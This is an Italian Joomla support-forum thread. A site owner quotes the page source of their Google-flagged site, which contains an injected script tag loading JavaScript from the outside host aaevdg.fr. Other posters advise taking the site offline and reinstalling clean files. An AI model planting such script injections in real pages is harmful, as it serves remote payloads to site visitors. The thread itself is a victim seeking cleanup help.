Problema segnalazione malware

[pioch]

Ciao ragazzi, vi scrivo perchè ho il seguente problema. Da ieri sul mio sito www.seven7.org accedendo con google da un possibile malware con nome aaevdg.fr . Solo che non ho proprio idea di come mi abbia infettato e come posso fare per rimuoverlo. Qualcuno è cosi gentile da spiegarmi come fare? Ispezionando il sito con la funzione di google per vedere il codice sorgente ho trovato questo:

<script type="text/javascript" src="http://aaevdg.fr/img/carousel.js"></script></head>
	<body>
	<div id="body_outer">
	<div id="body_top">
	<div id="header_left_right_outer">
	<div id="header_left_right">
	<div id="header_left_right_inner">
	<div id="header_left_outer">
Come faccio a eliminarlo? dove devo andare? Grazie mille ragazzi, mi sareste molto d'aiuto se potete aiutarmi a risolvere il problema.	<div id="header_left">

[BelinBelan]

ciao pioch,


la prima cosa che dovresti fare è mettere off-line il sito.


poi aggiornare a Joomla! 2.5 o 3.1.x se puoi.


inoltre dovrai "riabilitarlo" agli occhi di google, ci vorranno sudore e mesi... 


Sei messo male ma male ma male...

[pioch]

Il fatto è che solo con google chrome da questo problema che questa azienda francese si sia intromessa nel mio sito. Non posso aggiornare ora a joomla 2.5 o 3 perchè non esiste il tamplate e le estensioni che utilizzo quindi li sarei ancora più in difficoltà. Più avanti aggiornerò e cambierò template ma ora mi è proprio impossibile per questioni di tempo da dedicare al sito. Come potrei fare dunque per eliminare questo malware? So che poi dovrò mandare a google nuovamente il sito da ricontrollare solo che prima dovrei togliere il malware    Grazie mille per le risposte tempestive

[BelinBelan]

intanto metti il sito offline.


questo perché più sarà visitato da utenti e spider sarà sempre segnalato come infetto.


poi scarichi tutto in locale


sovrascrivi tutti i file con una installazione di Joomla! stessa versione!!! tranne la cartella "installation" ovviamente.


sovrascrivi eventualmente anche il file del template... se non l'avevi modificato (perderai ogni modifica)


una veloce passata ai file con qualche antivirus... e via!


rimetti tutto on-line via ftp e dovrebbe funzionare tutto. 




p.s: questa è una soluzione Radicale ma a mio avviso funziona meglio di una eventuale ricerca/rimozione manuale..

[dolphin73]

Ho lo stesso problema, non si riesce proprio a trovare anche se dal codice sorgente è ben visibile. Se qualcuno sa come aiutarci ....

[mau_develop]

leggete nell'apposita sezione, tutto ciò che c'è da sapere è già stato detto